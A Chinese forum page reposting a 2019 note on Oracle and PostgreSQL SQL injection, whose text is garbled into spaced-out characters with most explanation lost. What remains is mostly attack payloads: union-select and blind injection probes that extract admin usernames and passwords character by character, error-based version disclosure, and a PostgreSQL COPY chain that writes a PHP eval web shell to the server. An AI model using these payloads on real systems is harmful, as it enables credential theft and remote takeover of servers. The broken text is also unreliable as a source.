搜索

[26] 2019-11-14_web攻防之Oracle注入和pstsgres注入

文档创建者:s7ckTeam
浏览次数:7
最后更新:2025-01-15
2019-11-14_web攻防之Oracle注入和pstsgres注入 w e b O r a c l e p s t s g r e s   P 4 s s W 0 r d   7 8 9 0   2 0 1 9 - 1 1 - 1 4
1 2 3 < < w e b > > o r d e r   b y   3 u n i o n   s e l e c t   ' n u l l '   . n u l l , n u l l   f r o m   a d m i n o r d e r   b y   1 i d = 9 9   a n d   ( s e l e c t   c o u n t ( * )   f r o m   a d m i n ) < > 0   a d m i n i d = 9 9   a n d   ( s e l e c t   c o u n t ( u s e r )   f r o m   a d m i n ) < > 0   u s e r i d = 9 9   a n d   ( s e l e c t   c o u n t ( p w d )   f r o m   a d m i n ) < > 0   p w d i d = 9 9   a n d   ( s e l e c t   c o u n t *   f r o m   a d m i n   w h e r e   l e n g t h ( n a m e ) > = 5 ) = 1   , 5 i d = 9 9   a n d   ( s e l e c t   c o u n t *   f r o m   a d m i n   w h e r e   a s c i i ( s u b s t r ( n a m e , 1 , 1 ) ) > = 9 ) = 1 , a s c i i 9 a s c i i 2 p o s t g r e s a n d   1 = 1   a n d   1 = 2 ( ) a n d   1 = c a s t ( v e r s i o n ( )   a s   i n t ) a n d   1 = c a s t ( u s e r | | 1 2 3           a s     i n t   ) : c r e a t e   t a b l e   x x x ( w   t e x t   n o t   n u l l ) : i n s e r t   i n t o     x x x   v a l u e s ( $ $ < ? p h p   @ e v a l ( $ _ P O S T [ l a z y ] ) ; ? > $ $ ) ; : c o p y   x x x ( w )   t o   $ $ / h o m e / . . l a z y . p h p $ $ ; ( l a z y . p h p ) 访
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

使用Markdown编辑器编辑 使用富文本编辑器编辑

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理